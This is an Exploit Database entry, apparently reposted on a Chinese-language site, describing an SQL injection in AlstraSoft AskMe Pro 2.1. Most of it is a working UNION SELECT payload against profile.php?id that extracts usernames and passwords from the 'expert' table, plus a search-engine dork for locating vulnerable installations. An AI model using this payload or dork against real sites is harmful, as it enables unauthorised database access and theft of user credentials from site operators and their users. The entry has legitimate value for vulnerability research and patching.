Alstrasoft AskMe Pro 2.1 – ‘profile.php’ SQL Injection

• Exploit Database
• 36 阅读

• 作者： CoBRa_21
  日期： 2010-09-12
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14986/

• ########################################################################################
  AlstraSoft AskMe Pro ( profile.php?id ) SQL Injection Vulnerability 
  ########################################################################################
  
  Author : CoBRa_21
  Author Web Page : null [ I've sold my website (ipbul.org) ]
  Dork : inurl:forum_answer.php?que_id
  Script Page : http://www.alstrasoft.com/
  
  ########################################################################################
   
  Sql Injection :
  
  http://localhost/[path]/profile.php?id=-5 union select 0,group_concat(username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from+expert
  
  ########################################################################################
  Thanks cyber-warrior.org&e-banka.org & AKINCILAR & ipbul.org
  ########################################################################################